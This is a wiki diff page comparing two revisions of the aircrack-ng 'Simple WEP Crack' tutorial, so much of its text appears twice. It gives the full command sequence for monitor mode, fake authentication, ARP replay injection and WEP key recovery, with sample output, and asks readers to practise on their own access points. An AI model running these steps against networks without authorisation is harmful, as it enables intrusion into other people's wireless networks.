User Tools

Site Tools


simple_wep_crack

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revision Previous revision
Next revision
Previous revision
simple_wep_crack [2007/05/16 22:53]
darkaudax
simple_wep_crack [2018/03/11 20:13] (current)
mister_x [Introduction] Removed link to trac
Line 1: Line 1:
 ====== Tutorial: Simple WEP Crack ====== ====== Tutorial: Simple WEP Crack ======
-Version: 1.04 May 152007\\+Version: 1.20 January 112010\\
 By: darkAudax By: darkAudax
- 
  
 ===== Introduction ===== ===== Introduction =====
  
 This tutorial walks you though a very simple case to crack a WEP key.  It is intended to build your basic skills and get you familiar with the concepts. ​ It assumes you have a working wireless card with drivers already patched for injection. This tutorial walks you though a very simple case to crack a WEP key.  It is intended to build your basic skills and get you familiar with the concepts. ​ It assumes you have a working wireless card with drivers already patched for injection.
 +
 +The basic concept behind this tutorial is using aireplay-ng replay an ARP packet to generate new unique IVs.  In turn, aircrack-ng uses the new unique IVs to crack the WEP key.  It is important to understand what an ARP packet is.  This [[arp-request_reinjection#​what_is_arp|"​What is an ARP?"​]] section provides the details.
  
 For a start to finish newbie guide, see the [[newbie_guide|Linux Newbie Guide]]. ​ Although this tutorial does not cover all the steps, it does attempt to provide much more detailed examples of the steps to actually crack a WEP key plus explain the reason and background of each step.  For more information on installing aircrck-ng, see [[install_aircrack|Installing Aircrack-ng]] and for installing drivers see [[install_drivers|Installing Drivers]]. For a start to finish newbie guide, see the [[newbie_guide|Linux Newbie Guide]]. ​ Although this tutorial does not cover all the steps, it does attempt to provide much more detailed examples of the steps to actually crack a WEP key plus explain the reason and background of each step.  For more information on installing aircrck-ng, see [[install_aircrack|Installing Aircrack-ng]] and for installing drivers see [[install_drivers|Installing Drivers]].
  
 It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it. It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it.
- 
-I would like to acknowledge and thank the [[http://​trac.aircrack-ng.org|Aircrack-ng team]] for producing such a great robust tool.  
  
 Please send me any constructive feedback, positive or negative. Additional troubleshooting ideas and tips are especially welcome. Please send me any constructive feedback, positive or negative. Additional troubleshooting ideas and tips are especially welcome.
- 
  
 ===== Assumptions ===== ===== Assumptions =====
Line 22: Line 20:
   * You are using drivers patched for injection. Use the [[injection_test|injection test]] to confirm your card can inject prior to proceeding.   * You are using drivers patched for injection. Use the [[injection_test|injection test]] to confirm your card can inject prior to proceeding.
   * You are physically close enough to send and receive access point packets. ​ Remember that just because you can receive packets from the access point does not mean you may will be able to transmit packets to the AP.  The wireless card strength is typically less then the AP strength. ​ So you have to be physically close enough for your transmitted packets to reach and be received by the AP.  You should confirm that you can communicate with the specific AP by following [[injection_test#​hidden_or_specific_ssid|these instructions]].   * You are physically close enough to send and receive access point packets. ​ Remember that just because you can receive packets from the access point does not mean you may will be able to transmit packets to the AP.  The wireless card strength is typically less then the AP strength. ​ So you have to be physically close enough for your transmitted packets to reach and be received by the AP.  You should confirm that you can communicate with the specific AP by following [[injection_test#​hidden_or_specific_ssid|these instructions]].
-  * You are using v0.9 of aircrack-ng. If you use a different version then some of the command ​options may have to be changed.+  ​* There is at least one wired or wireless client connected to the network and they are active. ​ The reason is that this tutorial depends on receiving at least one ARP request packet and if there are no active clients then there will never be any ARP request packets. 
 +  ​* You are using v0.9 of aircrack-ng. If you use a different version then some of the common ​options may have to be changed.
  
 Ensure all of the above assumptions are true, otherwise the advice that follows will not work.  In the examples below, you will need to change "​ath0"​ to the interface name which is specific to your wireless card. Ensure all of the above assumptions are true, otherwise the advice that follows will not work.  In the examples below, you will need to change "​ath0"​ to the interface name which is specific to your wireless card.
- 
-In the examples, the option "​double dash bssid" is shown as "- -bssid"​. ​ Remember to remove the space between the two dashes when using it in real life.  This also applies to  "- -ivs". 
  
 ===== Equipment used ===== ===== Equipment used =====
Line 39: Line 36:
  
 You should gather the equivalent information for the network you will be working on.  Then just change the values in the examples below to the specific network. You should gather the equivalent information for the network you will be working on.  Then just change the values in the examples below to the specific network.
- 
  
 ===== Solution ===== ===== Solution =====
- 
 ==== Solution Overview ==== ==== Solution Overview ====
  
Line 52: Line 47:
  
   - Start the wireless interface in monitor mode on the specific AP channel   - Start the wireless interface in monitor mode on the specific AP channel
 +  - Test the injection capability of the wireless device to the AP
   - Use aireplay-ng to do a fake authentication with the access point   - Use aireplay-ng to do a fake authentication with the access point
   - Start airodump-ng on AP channel with a bssid filter to collect the new unique IVs   - Start airodump-ng on AP channel with a bssid filter to collect the new unique IVs
   - Start aireplay-ng in ARP request replay mode to inject packets   - Start aireplay-ng in ARP request replay mode to inject packets
   - Run aircrack-ng to crack key using the IVs collected   - Run aircrack-ng to crack key using the IVs collected
- 
  
 ==== Step 1 - Start the wireless interface in monitor mode on AP channel ==== ==== Step 1 - Start the wireless interface in monitor mode on AP channel ====
  
-The purpose of this step is to put your card into what is called monitor mode.  Monitor mode is mode whereby your card can listen to every packet in the air.  Normally your card will only "​hear"​ packets addressed to you.  By hearing every packet, we can later select some for injection. ​ As well, only (there are some rare exceptions) monitor mode allows you to inject packets.+The purpose of this step is to put your card into what is called monitor mode.  Monitor mode is mode whereby your card can listen to every packet in the air.  Normally your card will only "​hear"​ packets addressed to you.  By hearing every packet, we can later select some for injection. ​ As well, only (there are some rare exceptions) monitor mode allows you to inject packets. ​(Note: this procedure is different for non-Atheros cards.)
  
 First stop ath0 by entering: First stop ath0 by entering:
Line 87: Line 82:
    ​airmon-ng start wifi0 9    ​airmon-ng start wifi0 9
  
-Note: In this command we use "​wifi0"​ instead of our wireless interface of "​ath0"​. ​ This is because the madwifi-ng drivers are being used.+Substitute the channel number that your AP runs on for "​9"​ in the command above. ​ This is important. ​ You must have your wireless card locked to the AP channel for the following steps in this tutorial to work correctly. 
 + 
 +Note: In this command we use "​wifi0"​ instead of our wireless interface of "​ath0"​. ​ This is because the madwifi-ng drivers are being used.  For other drivers, use the wireless interface name.  Examples: "​wlan0"​ or "​rausb0"​.
  
 The system will respond: The system will respond:
Line 118: Line 115:
           Tx excessive retries:​0 ​ Invalid misc:​0 ​  ​Missed beacon:0           Tx excessive retries:​0 ​ Invalid misc:​0 ​  ​Missed beacon:0
  
-In the response above, you can see that ath0 is in monitor mode, on the 2.452GHz frequency which is channel 9 and the Access Point shows the MAC address of your wireless card.  Please note that only the madwifi-ng drivers show the MAC address of your wireless card, the other drivers do not do this.  So everything is good.   ​It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly.+In the response above, you can see that ath0 is in monitor mode, on the 2.452GHz frequency which is channel 9 and the Access Point shows the MAC address of your wireless card.  Please note that only the madwifi-ng drivers show the MAC address of your wireless card, the other drivers do not do this.  So everything is good. It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly.
  
 To match the frequency to the channel, check out: To match the frequency to the channel, check out:
-http://www.rflinx.com/help/calculations/#​2.4ghz_wifi_channels then select the "​Wifi ​Channel ​Selection and Channel Overlap"​ tab.  This will give you the frequency for each channel.+http://www.cisco.com/en/US/​docs/​wireless/​technology/​channel/​deployment/​guide/Channel.html#​wp134132 ​.  This will give you the frequency for each channel.
  
  
-==== Step 2 - Use aireplay-ng to do a fake authentication with the access point ====+==== Step 2 - Test Wireless Device Packet Injection ​====
  
-In order for an access point to accept a packet, the source MAC address must already be associated. ​ If the source MAC address you are injecting ​is not associated then the AP ignores the packet ​and sends out a "​DeAuthentication"​ packet. ​ In this state, no new IVs are created because the AP is ignoring all the injected ​packets.+The purpose of this step ensures that your card is within distance of your AP and can inject ​packets ​to it.
  
-The lack of association with the access point is the single biggest reason why injection fails. ​ Remember the golden rule The MAC you use for injection must be associated with the AP by either using fake authentication or using a MAC from an already-associated client.+Enter:
  
-To associate with an access point, use fake authentication:​ +   aireplay-ng --e teddy -a 00:​14:​6C:​7E:​40:​80 ​ ath0
- +
-   aireplay-ng -1 0 -e teddy -a 00:​14:​6C:​7E:​40:​80 ​-h 00:​0F:​B5:​88:​AC:​82 ​ath0+
  
 Where: Where:
-  *-means fake authentication +  *-means injection test
-  *0 reassociation timing in seconds+
   *-e teddy is the wireless network name   *-e teddy is the wireless network name
   *-a 00:​14:​6C:​7E:​40:​80 is the access point MAC address   *-a 00:​14:​6C:​7E:​40:​80 is the access point MAC address
-  *-h 00:​0F:​B5:​88:​AC:​82 is our card MAC addresss 
   *ath0 is the wireless interface name   *ath0 is the wireless interface name
  
-Success looks like: +The system should respond with:
-  18:​18:​20 ​ Sending Authentication Request +
-  18:​18:​20 ​ Authentication successful +
-  18:​18:​20 ​ Sending Association Request +
-  18:​18:​20 ​ Association successful :-)+
  
-Or another variation ​for picky access points:+   ​09:​23:​35 ​ Waiting ​for beacon frame (BSSID: 00:​14:​6C:​7E:​40:​80) on channel 9 
 +   ​09:​23:​35 ​ Trying broadcast probe requests... 
 +   ​09:​23:​35 ​ Injection is working! 
 +   ​09:​23:​37 ​ Found 1 AP  
 +    
 +   ​09:​23:​37 ​ Trying directed probe requests... 
 +   ​09:​23:​37 ​ 00:​14:​6C:​7E:​40:​80 - channel: 9 - '​teddy'​ 
 +   ​09:​23:​39 ​ Ping (min/​avg/​max):​ 1.827ms/​68.145ms/​111.610ms Power: 33.73 
 +   ​09:​23:​39 ​ 30/30100%
  
-  aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:​14:​6C:​7E:​40:​80 -h 00:​0F:​B5:​88:​AC:​82 ath0 +The last line is important.  ​Ideally it should say 100% or very high percentage.  If it is low then you are too far away from the AP or too close.  If it is zero then injection ​is not working ​and you need to patch your drivers ​or use different drivers.
- +
-Where: +
-  * 6000 - Reauthenticate very 6000 seconds.  ​The long period also causes keep alive packets to be sent. +
-  * -o 1 - Send only one set of packets at a time.  Default ​is multiple and this confuses some APs. +
-  * -q 10 - Send keep alive packets every 10 seconds. +
- +
-Success looks like: +
-  18:​22:​32 ​ Sending Authentication Request +
-  18:​22:​32 ​ Authentication successful +
-  18:​22:​32 ​ Sending Association Request +
-  18:​22:​32 ​ Association successful :-) +
-  18:​22:​42 ​ Sending keep-alive packet +
-  18:​22:​52 ​ Sending keep-alive packet +
-  # and so on. +
- +
-Here is an example of what failed authentication looks like: +
-  8:​28:​02 ​ Sending Authentication Request +
-  18:​28:​02 ​ Authentication successful +
-  18:​28:​02 ​ Sending Association Request +
-  18:​28:​02 ​ Association successful :-) +
-  18:​28:​02 ​ Got a deauthentication packet! +
-  18:​28:​05 ​ Sending Authentication Request +
-  18:​28:​05 ​ Authentication successful +
-  18:​28:​05 ​ Sending Association Request +
-  18:​28:​10 ​ Sending Authentication Request +
-  18:​28:​10 ​ Authentication successful +
-  18:​28:​10 ​ Sending Association Request +
- +
-Notice the "Got a deauthentication packet"​ and the continuous retries above. ​ Do not proceed to the next step until you have the fake authentication running correctly. +
- +
-=== Troubleshooting Tips === +
- +
-  *Some access points are configured to only allow selected MAC addresses to associate and connect.  If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list.  If you suspect this is the problem, use the fullowing command while trying to do fake authentication. ​ Start another session and... +
- +
-Run: tcpdump -n -vvv -s0 -e -i <​interface name> | grep -E "​(RA:<​MAC addreess of your card>​|Authentication|ssoc)"​ +
- +
-You would then look for error messages. +
- +
-  *If at any time you wish to confirm you are properly associated ​is to use tcpdump ​and look at the packets. ​ Start another session and... +
-   +
-Run: "​tcpdump -n -e -s0 -vvv -i ath0"​ +
- +
-Here is a typical tcpdump error message ​you are looking for: +
- +
-   ​11:​04:​34.360700 314us BSSID:​00:​14:​6c:​7e:​40:​80 DA:​00:​0F:​B5:​88:​AC:​82 SA:​00:​14:​6c:​7e:​40:​80 ​  ​DeAuthentication:​ Class 3 frame received from nonassociated station +
- +
-Notice that the access point (00:​14:​6c:​7e:​40:​80) is telling the source (00:​0F:​B5:​88:​AC:​82) you are not associated. ​ Meaning, the AP will not process ​or accept the injected packets.+
  
-If you want to select only the DeAuth packets with tcpdump then you can use: "​tcpdump -n -e -s0 -vvv -i ath0 grep DeAuth"​. ​ You may need to tweak the phrase "​DeAuth"​ to pick out the exact packets you want.+See the [[injection_test|injection test]] for more details.
  
  
-==== Step 3 -  Start airodump-ng to capture the IVs ====+==== Step 3 - Start airodump-ng to capture the IVs ====
  
 The purpose of this step is to capture the IVs generated. ​ This step starts airodump-ng to capture the IVs from the specific access point. The purpose of this step is to capture the IVs generated. ​ This step starts airodump-ng to capture the IVs from the specific access point.
Line 208: Line 158:
 Open another console session to capture the generated IVs.  Then enter: Open another console session to capture the generated IVs.  Then enter:
  
-   ​airodump-ng -c 9 - -bssid 00:​14:​6C:​7E:​40:​80 -w output ath0+   ​airodump-ng -c 9 --bssid 00:​14:​6C:​7E:​40:​80 -w output ath0
  
 Where: Where:
   *-c 9 is the channel for the wireless network   *-c 9 is the channel for the wireless network
-  *- -bssid 00:​14:​6C:​7E:​40:​80 is the access point MAC address. ​ This eliminate extraneous traffic.+  *-''''​-bssid 00:​14:​6C:​7E:​40:​80 is the access point MAC address. ​ This eliminate extraneous traffic.
   *-w capture is file name prefix for the file which will contain the IVs.   *-w capture is file name prefix for the file which will contain the IVs.
   *ath0 is the interface name.   *ath0 is the interface name.
Line 229: Line 179:
  
  
-==== Step 4 -  ​Start ​aireplay-ng ​in ARP request replay mode ====+==== Step 4 - Use aireplay-ng ​to do a fake authentication with the access point ====
  
-The purpose of this step is to start aireplay-ng in a mode which listens for ARP requests then reinjects them back into the network. ​  For an explanation of ARP, see this [[http://​www.pcmag.com/​encyclopedia_term/​0,​2542,​t=ARP&​i=37988,​00.asp|PC Magazine page]] or [[http://​en.wikipedia.org/​wiki/​Address_Resolution_Protocol|Wikipedia]]. ​ The reason we select ARP request packets is because the AP will normally rebroadcast them and generate a new IV.  Again, this is our objective, to obtain a large number of IVs in a short period of time. +In order for an access point to accept a packet, the source MAC address must already be associated. ​ If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a "​DeAuthentication"​ packet ​in cleartext.  In this state, no new IVs are created because the AP is ignoring all the injected packets.
- +
-Open another console session and enter: +
- +
-   ​aireplay-ng -3 -b 00:​14:​6C:​7E:​40:​80 -h 00:​0F:​B5:​88:​AC:​82 ath0 +
- +
-It will start listening for ARP requests and when it hears one, aireplay-ng will immediately start to inject it.  On your home network, here is an easy way to generate an ARP request: ​ On a wired PC, ping a non-existent IP on your home LAN. +
- +
-Here is what the screen looks like when ARP requests are being injected: +
- +
-   ​Saving ARP requests in replay_arp-0321-191525.cap +
-   You should also start airodump-ng to capture replies. +
-   Read 629399 packets (got 316283 ARP requests), sent 210955 packets... +
- +
-You can confirm that you are injecting by checking your airodump-ng screen. ​ The data packets should be increasing rapidly. ​ The "#/​s"​ should be a decent number. ​ However, decent depends on a large variety of factors. ​ A typical range is 300 to 400 data packets per second. ​ It can as low as a 100/second and as high as a 1000/​second. +
- +
- +
-==== Step 5 - Run aircrack-ng to obtain the WEP key ==== +
- +
-The purpose of this step is to obtain the WEP key from the IVs gathered in the previous steps. +
- +
-Note: For learning purposes, you should use a 64 bit WEP key on your AP to speed up the cracking process. ​ If this is the case, then you can include "-n 64" to limit the checking of keys to 64 bits. +
- +
-Two methods will be shown. ​ It is recommended you try both for learning purposes. ​ By trying both methods, you will see quickly the PTW method successfully determines the WEP key compared to the FMS/Korek method. ​ As a reminder, the PTW method only works successfully with arp request/​reply packets. ​ Since this tutorial covers injection arp request packets, you can properly use this method. ​ The other requirement is that you capture the full packet with airodump-ng. ​ Meaning, do not use the "- -ivs" option. +
- +
-Start another console session and enter: +
- +
-   ​aircrack-ng -z -b 00:​14:​6C:​7E:​40:​80 output*.cap +
- +
-Where: +
-  * -z invokes the PTW WEP-cracking method. +
-  * -b 00:​14:​6C:​7E:​40:​80 selects the one access point we are interested in.  This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP. +
-  * output*.cap selects all files starting with "​output"​ and ending in "​.cap"​. +
- +
-Version: 1.04 May 15, 2007\\ +
-By: darkAudax +
- +
- +
-===== Introduction ===== +
- +
-This tutorial walks you though a very simple case to crack a WEP key.  It is intended to build your basic skills and get you familiar with the concepts. ​ It assumes you have a working wireless card with drivers already patched for injection. +
- +
-For a start to finish newbie guide, see the [[newbie_guide|Linux Newbie Guide]]. ​ Although this tutorial does not cover all the steps, it does attempt to provide much more detailed examples of the steps to actually crack a WEP key plus explain the reason and background of each step.  For more information on installing aircrck-ng, see [[install_aircrack|Installing Aircrack-ng]] and for installing drivers see [[install_drivers|Installing Drivers]]. +
- +
-It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it. +
- +
-I would like to acknowledge and thank the [[http://​trac.aircrack-ng.org|Aircrack-ng team]] for producing such a great robust tool.  +
- +
-Please send me any constructive feedback, positive or negative. Additional troubleshooting ideas and tips are especially welcome. +
- +
- +
-===== Assumptions ===== +
- +
-First, this solution assumes: +
-  * You are using drivers patched for injection. Use the [[injection_test|injection test]] to confirm your card can inject prior to proceeding. +
-  * You are physically close enough to send and receive access point packets. ​ Remember that just because you can receive packets from the access point does not mean you may will be able to transmit packets to the AP.  The wireless card strength is typically less then the AP strength. ​ So you have to be physically close enough for your transmitted packets to reach and be received by the AP.  You should confirm that you can communicate with the specific AP by following [[hidden_or_specific_ssid|these instructions]]. +
-  * You are using v0.9 of aircrack-ng. If you use a different version then some of the comman options may have to be changed. +
- +
-Ensure all of the above assumptions are true, otherwise the advice that follows will not work.  In the examples below, you will need to change "​ath0"​ to the interface name which is specific to your wireless card. +
- +
-In the examples, the option "​double dash bssid" is shown as "- -bssid"​. ​ Remember to remove the space between the two dashes when using it in real life.  This also applies to  "- -ivs"​. +
- +
-===== Equipment used ===== +
- +
-In this tutorial, here is what was used: +
- +
-  *MAC address of PC running aircrack-ng suite: 00:​0F:​B5:​88:​AC:​82 +
-  *BSSID (MAC address of access point): 00:​14:​6C:​7E:​40:​80 +
-  *ESSID (Wireless network name): teddy +
-  *Access point channel: 9 +
-  *Wireless interface: ath0 +
- +
-You should gather the equivalent information for the network you will be working on.  Then just change the values in the examples below to the specific network. +
- +
- +
-===== Solution ===== +
- +
-==== Solution Overview ==== +
- +
-To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). ​ Normal network traffic does not typically generate these IVs very quickly. ​ Theoretically,​ if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them.  Since none of us are patient, we use a technique called injection to speed up the process. ​ Injection involves having the access point (AP) resend selected packets over and over very rapidly. ​ This allows us to capture a large number of IVs in a short period of time. +
- +
-Once we have captured a large number of IVs, we can use them to determine the WEP key. +
- +
-Here are the basic steps we will be going through: +
- +
-  - Start the wireless interface in monitor mode on the specific AP channel +
-  - Use aireplay-ng to do a fake authentication with the access point +
-  - Start airodump-ng on AP channel with a bssid filter to collect the new unique IVs +
-  - Start aireplay-ng in ARP request replay mode to inject packets +
-  - Run aircrack-ng to crack key using the IVs collected +
- +
- +
-==== Step 1 - Start the wireless interface in monitor mode on AP channel ==== +
- +
-The purpose of this step is to put your card into what is called monitor mode.  Monitor mode is mode whereby your card can listen to every packet in the air.  Normally your card will only "​hear"​ packets addressed to you.  By hearing every packet, we can later select some for injection. ​ As well, only (there are some rare exceptions) monitor mode allows you to inject packets. +
- +
-First stop ath0 by entering: +
- +
-   ​airmon-ng stop ath0    +
- +
-The system responds: +
- +
-   ​Interface ​      ​Chipset ​        ​Driver +
-    +
-   ​wifi0 ​          ​Atheros ​        ​madwifi-ng +
-   ​ath0 ​           Atheros ​        ​madwifi-ng VAP (parent: wifi0) (VAP destroyed) +
- +
-Enter "​iwconfig"​ to ensure there are no other athX interfaces. ​ It should look similar to this: +
- +
-   ​lo ​       no wireless extensions. +
-    +
-   ​eth0 ​     no wireless extensions. +
-    +
-   ​wifi0 ​    no wireless extensions. +
-  +
-If there are any remaining athX interfaces, ​ then stop each one.  When you are finished, run "​iwconfig"​ to ensure there are none left. +
- +
-Now, enter the following command to start the wireless card on channel 9 in monitor mode: +
- +
-   ​airmon-ng start wifi0 9 +
- +
-Note: In this command we use "​wifi0"​ instead of our wireless interface of "​ath0"​. ​ This is because the madwifi-ng drivers are being used. +
- +
-The system will respond: +
- +
-   ​Interface ​      ​Chipset ​        ​Driver +
-    +
-   ​wifi0 ​          ​Atheros ​        ​madwifi-ng +
-   ​ath0 ​           Atheros ​        ​madwifi-ng VAP (parent: wifi0) (monitor mode enabled) +
- +
-You will notice that "​ath0"​ is reported above as being put into monitor mode. +
- +
-To confirm the interface is properly setup, enter "​iwconfig"​. +
- +
-The system will respond: +
- +
-   ​lo ​       no wireless extensions. +
-    +
-   ​wifi0 ​    no wireless extensions. +
-    +
-   ​eth0 ​     no wireless extensions. +
-    +
-   ​ath0 ​     IEEE 802.11g ​ ESSID:"" ​ Nickname:""​ +
-          Mode:​Monitor ​ Frequency:​2.452 GHz  Access Point: 00:​0F:​B5:​88:​AC:​82 ​   +
-          Bit Rate:0 kb/s   ​Tx-Power:​18 dBm   ​Sensitivity=0/​3 ​  +
-          Retry:​off ​  RTS thr:​off ​  ​Fragment thr:off +
-          Encryption key:off +
-          Power Management:​off +
-          Link Quality=0/​94 ​ Signal level=-95 dBm  Noise level=-95 dBm +
-          Rx invalid nwid:​0 ​ Rx invalid crypt:​0 ​ Rx invalid frag:0 +
-          Tx excessive retries:​0 ​ Invalid misc:​0 ​  ​Missed beacon:0 +
- +
-In the response above, you can see that ath0 is in monitor mode, on the 2.452GHz frequency which is channel 9 and the Access Point shows the MAC address of your wireless card.  Please note that only the madwifi-ng drivers show the MAC address of your wireless card, the other drivers do not do this.  So everything is good.   It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly. +
- +
-To match the frequency to the channel, check out: +
-http://​www.rflinx.com/​help/​calculations/#​2.4ghz_wifi_channels then select the "Wifi Channel Selection and Channel Overlap"​ tab.  This will give you the frequency for each channel. +
- +
- +
-==== Step 2 - Use aireplay-ng to do a fake authentication with the access point ==== +
- +
-In order for an access point to accept a packet, the source MAC address must already be associated. ​ If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a "​DeAuthentication"​ packet. ​ In this state, no new IVs are created because the AP is ignoring all the injected packets.+
  
 The lack of association with the access point is the single biggest reason why injection fails. ​ Remember the golden rule:  The MAC you use for injection must be associated with the AP by either using fake authentication or using a MAC from an already-associated client. The lack of association with the access point is the single biggest reason why injection fails. ​ Remember the golden rule:  The MAC you use for injection must be associated with the AP by either using fake authentication or using a MAC from an already-associated client.
Line 404: Line 194:
   *-e teddy is the wireless network name   *-e teddy is the wireless network name
   *-a 00:​14:​6C:​7E:​40:​80 is the access point MAC address   *-a 00:​14:​6C:​7E:​40:​80 is the access point MAC address
-  *-h 00:​0F:​B5:​88:​AC:​82 is our card MAC addresss+  *-h 00:​0F:​B5:​88:​AC:​82 is our card MAC address
   *ath0 is the wireless interface name   *ath0 is the wireless interface name
  
Line 418: Line 208:
  
 Where: Where:
-  * 6000 - Reauthenticate ​very 6000 seconds. ​ The long period also causes keep alive packets to be sent.+  * 6000 - Reauthenticate ​every 6000 seconds. ​ The long period also causes keep alive packets to be sent.
   * -o 1 - Send only one set of packets at a time.  Default is multiple and this confuses some APs.   * -o 1 - Send only one set of packets at a time.  Default is multiple and this confuses some APs.
   * -q 10 - Send keep alive packets every 10 seconds.   * -q 10 - Send keep alive packets every 10 seconds.
Line 448: Line 238:
 === Troubleshooting Tips === === Troubleshooting Tips ===
  
-  *Some access points are configured to only allow selected MAC addresses to associate and connect. ​ If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list.  If you suspect this is the problem, use the fullowing ​command while trying to do fake authentication. ​ Start another session and...+  *Some access points are configured to only allow selected MAC addresses to associate and connect. ​ If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list.  If you suspect this is the problem, use the following ​command while trying to do fake authentication. ​ Start another session and...
  
-Run: tcpdump -n -vvv -s0 -e -i <​interface name> | grep -E "​(RA:<​MAC ​addreess ​of your card>​|Authentication|ssoc)"​+Run: tcpdump -n -vvv -s0 -e -i <​interface name> | grep -i -E "​(RA:<​MAC ​address ​of your card>​|Authentication|ssoc)"​
  
 You would then look for error messages. You would then look for error messages.
Line 464: Line 254:
 Notice that the access point (00:​14:​6c:​7e:​40:​80) is telling the source (00:​0F:​B5:​88:​AC:​82) you are not associated. ​ Meaning, the AP will not process or accept the injected packets. Notice that the access point (00:​14:​6c:​7e:​40:​80) is telling the source (00:​0F:​B5:​88:​AC:​82) you are not associated. ​ Meaning, the AP will not process or accept the injected packets.
  
-If you want to select only the DeAuth packets with tcpdump then you can use: "​tcpdump -n -e -s0 -vvv -i ath0 | grep DeAuth"​. ​ You may need to tweak the phrase "​DeAuth"​ to pick out the exact packets you want.+If you want to select only the DeAuth packets with tcpdump then you can use: "​tcpdump -n -e -s0 -vvv -i ath0 | grep -i DeAuth"​. ​ You may need to tweak the phrase "​DeAuth"​ to pick out the exact packets you want.
  
- +==== Step -  Start aireplay-ng in ARP request replay mode ====
-==== Step 3 -  Start airodump-ng to capture the IVs ==== +
- +
-The purpose of this step is to capture the IVs generated. ​ This step starts airodump-ng to capture the IVs from the specific access point. +
- +
-Open another console session to capture the generated IVs.  Then enter: +
- +
-   ​airodump-ng -c 9 - -bssid 00:​14:​6C:​7E:​40:​80 -w output ath0 +
- +
-Where: +
-  *-c 9 is the channel for the wireless network +
-  *- -bssid 00:​14:​6C:​7E:​40:​80 is the access point MAC address. ​ This eliminate extraneous traffic. +
-  *-w capture is file name prefix for the file which will contain the IVs. +
-  *ath0 is the interface name. +
- +
-While the injection is taking place (later), the screen will look similar to this: +
- +
-   ​CH ​ 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25  +
-                                                                                                                 +
-   ​BSSID ​             PWR RXQ  Beacons ​   #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID +
-                                                                                                               +
-   ​00:​14:​6C:​7E:​40:​80 ​  42 100     ​5240 ​  ​178307 ​ 338   ​9 ​ 54  WEP  WEP         ​teddy ​                           +
-                                                                                                               +
-   ​BSSID ​             STATION ​           PWR  Lost  Packets ​ Probes ​                                             +
-                                                                                                               +
-   ​00:​14:​6C:​7E:​40:​80 ​ 00:​0F:​B5:​88:​AC:​82 ​  ​42 ​    ​0 ​  ​183782 ​  +
- +
- +
-==== Step 4 -  Start aireplay-ng in ARP request replay mode ====+
  
 The purpose of this step is to start aireplay-ng in a mode which listens for ARP requests then reinjects them back into the network. ​  For an explanation of ARP, see this [[http://​www.pcmag.com/​encyclopedia_term/​0,​2542,​t=ARP&​i=37988,​00.asp|PC Magazine page]] or [[http://​en.wikipedia.org/​wiki/​Address_Resolution_Protocol|Wikipedia]]. ​ The reason we select ARP request packets is because the AP will normally rebroadcast them and generate a new IV.  Again, this is our objective, to obtain a large number of IVs in a short period of time. The purpose of this step is to start aireplay-ng in a mode which listens for ARP requests then reinjects them back into the network. ​  For an explanation of ARP, see this [[http://​www.pcmag.com/​encyclopedia_term/​0,​2542,​t=ARP&​i=37988,​00.asp|PC Magazine page]] or [[http://​en.wikipedia.org/​wiki/​Address_Resolution_Protocol|Wikipedia]]. ​ The reason we select ARP request packets is because the AP will normally rebroadcast them and generate a new IV.  Again, this is our objective, to obtain a large number of IVs in a short period of time.
Line 502: Line 264:
    ​aireplay-ng -3 -b 00:​14:​6C:​7E:​40:​80 -h 00:​0F:​B5:​88:​AC:​82 ath0    ​aireplay-ng -3 -b 00:​14:​6C:​7E:​40:​80 -h 00:​0F:​B5:​88:​AC:​82 ath0
  
-It will start listening for ARP requests and when it hears one, aireplay-ng will immediately start to inject it.  ​On your home network, here is an easy way to generate an ARP request: ​ On wired PC, ping a non-existent IP on your home LAN.+It will start listening for ARP requests and when it hears one, aireplay-ng will immediately start to inject it.  ​See the [[simple_wep_crack#​Generating ARPs]] section for tricks on generating ARPs if your screen says "got 0 ARP requests"​ after waiting ​long time.
  
 Here is what the screen looks like when ARP requests are being injected: Here is what the screen looks like when ARP requests are being injected:
Line 510: Line 272:
    Read 629399 packets (got 316283 ARP requests), sent 210955 packets...    Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
  
-You can confirm that you are injecting by checking your airodump-ng screen. ​ The data packets should be increasing rapidly. ​ The "#/​s"​ should be a decent number. ​ However, decent depends on a large variety of factors. ​ A typical range is 300 to 400 data packets per second. ​ It can as low as a 100/second and as high as a 1000/second.+You can confirm that you are injecting by checking your airodump-ng screen. ​ The data packets should be increasing rapidly. ​ The "#/​s"​ should be a decent number. ​ However, decent depends on a large variety of factors. ​ A typical range is 300 to 400 data packets per second. ​ It can as low as a 100/second and as high as a 500/second.
  
  
-==== Step - Run aircrack-ng to obtain the WEP key ====+=== Troubleshooting Tips === 
 + 
 +  * If you receive a message similar to "Got a deauth/​disassoc packet. Is the source mac associated?",​ this means you have lost association with the AP.  All your injected packets will be ignored. ​ You must return to the fake authentication step (Step 3) and successfully associate with the AP. 
 + 
 +==== Step - Run aircrack-ng to obtain the WEP key ====
  
 The purpose of this step is to obtain the WEP key from the IVs gathered in the previous steps. The purpose of this step is to obtain the WEP key from the IVs gathered in the previous steps.
Line 519: Line 285:
 Note: For learning purposes, you should use a 64 bit WEP key on your AP to speed up the cracking process. ​ If this is the case, then you can include "-n 64" to limit the checking of keys to 64 bits. Note: For learning purposes, you should use a 64 bit WEP key on your AP to speed up the cracking process. ​ If this is the case, then you can include "-n 64" to limit the checking of keys to 64 bits.
  
